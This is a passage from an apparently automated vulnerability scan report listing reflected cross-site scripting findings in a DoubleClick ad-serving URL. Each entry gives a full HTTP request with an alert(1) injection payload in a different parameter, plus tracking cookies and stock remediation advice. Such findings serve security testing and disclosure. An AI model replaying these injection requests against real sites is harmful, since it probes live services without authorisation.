GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=bde3f"-alert(1)-"c3f8f3fe10d&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the l request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f0924'-alert(1)-'d944fb3d328 was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=f0924'-alert(1)-'d944fb3d328&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0965"-alert(1)-"e52ba1707a0 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113a0965"-alert(1)-"e52ba1707a0&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
var spongecellParams = { clickTag: "http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/14a/%2a/t%3B240046691%3B0-0%3B0%3B61212128%3B4307-300/250%3B41645533/41663320/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113a0965"-alert(1)-"e52ba1707a0&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/", site ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 659b7'-alert(1)-'48c5b44a640 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113659b7'-alert(1)-'48c5b44a640&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af2e8'-alert(1)-'d21b133853f was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253Aaf2e8'-alert(1)-'d21b133853f&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86249"-alert(1)-"a39acd29383 was submitted in the o parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A86249"-alert(1)-"a39acd29383&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61e01"-alert(1)-"f6a94de6365 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=61e01"-alert(1)-"f6a94de6365&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 361f7'-alert(1)-'dcec69549d0 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=361f7'-alert(1)-'dcec69549d0&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 364ee"-alert(1)-"92d1173afce was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=364ee"-alert(1)-"92d1173afce&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the orh request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9edc7'-alert(1)-'41c09628970 was submitted in the orh parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=9edc7'-alert(1)-'41c09628970&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2632e'-alert(1)-'577e5e6838f was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=2632e'-alert(1)-'577e5e6838f&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a81b"-alert(1)-"4e73517cc11 was submitted in the p parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=5a81b"-alert(1)-"4e73517cc11&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1be3'-alert(1)-'7047e28cee9 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=f1be3'-alert(1)-'7047e28cee9&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53fa6"-alert(1)-"a029626a71 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=53fa6"-alert(1)-"a029626a71&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cacfc'-alert(1)-'c6756df0d3 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAtcacfc'-alert(1)-'c6756df0d3&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b080"-alert(1)-"7bce70db57a was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt2b080"-alert(1)-"7bce70db57a&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 586dc'-alert(1)-'7568622394 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=586dc'-alert(1)-'7568622394&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fbb09"-alert(1)-"9415e248736 was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N5823.CNET/B4978620.22;sz=300x250;click0=http://adlog.com.com/adlog/e/r=10139&sg=503941&o=13054%253A13113%253A&h=cn&p=&b=14&l=&site=23&pt=2404&nd=13113&pid=fbb09"-alert(1)-"9415e248736&cid=0&pp=100&e=&rqid=00c13-ad-e7:4DB8339E8386C9&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=5cwh3woPOVQAAFsQlJYAAAAt&t=2011.04.27.23.35.36&event=58/;ord=2011.04.27.23.35.36? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.bnet.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1f9e'-alert(1)-'0465d79ff56 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
